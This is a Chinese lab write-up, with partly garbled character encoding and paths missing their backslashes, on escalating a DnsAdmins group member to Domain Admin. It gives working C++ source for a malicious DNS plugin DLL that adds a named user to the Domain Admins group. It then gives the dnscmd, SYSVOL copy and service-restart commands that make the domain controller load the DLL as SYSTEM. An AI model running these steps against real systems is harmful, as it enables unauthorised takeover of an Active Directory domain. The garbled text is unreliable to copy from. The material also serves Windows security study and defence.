0x01.背景

實(shí)驗(yàn)利用DNS Administrators 組成員，通過(guò)遠(yuǎn)程配置Dns服務(wù)，進(jìn)行Dll inject從而實(shí)現(xiàn)特權(quán)提升。
在域內(nèi)，Dns server 通常為Dc Server,Dns服務(wù)器管理基于rpc，通過(guò)調(diào)用c:windowssystem32dns.exe,創(chuàng)建Rpc接口，使用PIPEDNSSERVER命名管道進(jìn)行傳輸。

DNS服務(wù)默認(rèn)ACL 如下圖：

DNS.exe 默認(rèn)啟動(dòng)權(quán)限為NT AUTHORITYSYSTEM：

0x02、過(guò)程

0x0201 dll文件編譯：

dll源碼：

// dllmain.cpp : 定義 DLL 應(yīng)用程序的入口點(diǎn)。\#include "pch.h"Dword WINAPI DnsPluginInitialize(PVOID a1, PVOID a2){    return 0;}DWORD WINAPI DnsPluginCleanup(){    return 0;}DWORD WINAPI DnsPluginQuery(PVOID a1, PVOID a2, PVOID a3, PVOID a4){    WinExec("net group \"Domain Admins\" sixth-hospital /ADD /DOMAIN", SW_SHOWNORMAL);    return 0;}BOOL APIENTRY DllMain(HMODULE hModule,    DWORD  ul_reason_for_call,    LPVOID lpReserved){    switch (ul_reason_for_call)    {    case DLL_PROCESS_ATTACH:    case DLL_THREAD_ATTACH:    case DLL_THREAD_DETACH:    case DLL_PROCESS_DETACH:        break;    }    return TRUE;}

導(dǎo)出函數(shù)，Source.def文件：

EXPORTSDnsPluginInitializeDnsPluginCleanupDnsPluginQuery

編譯后查看導(dǎo)出函數(shù)是否正確：

0x0202 特權(quán)提升：

首先找到Dnsadmins

net user sixth-hospital /domain

將dll 復(fù)制到sysvol

copy Dlldns.dll \WIN-43QM2N9GRC4.hackhello.local\sysvol\hackhello.local\scripts

使用當(dāng)前用戶列舉AD c盤(pán)

dir \WIN-43QM2N9GRC4.hackhello.local\c$

執(zhí)行dnscmd 配置調(diào)用dll

dnscmd WIN-43QM2N9GRC4.hackhello.local /config /serverlevelplugindll \WIN-43QM2N9GRC4.hackhello.local\sysvol\hackhello.local\scripts\Dlldns.dll

此時(shí)查看dc注冊(cè)表，已經(jīng)配置好了dll路徑。

reg query HKEY_LOCAL_macHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters

重啟dns

sc stop dnssc start dns

重啟完服務(wù)后再執(zhí)行net命令

net user sixth-hospital /domain

可以看到已經(jīng)成功將Dnsadmins用戶提升至域管理員權(quán)限

我們列下c盤(pán)符下文件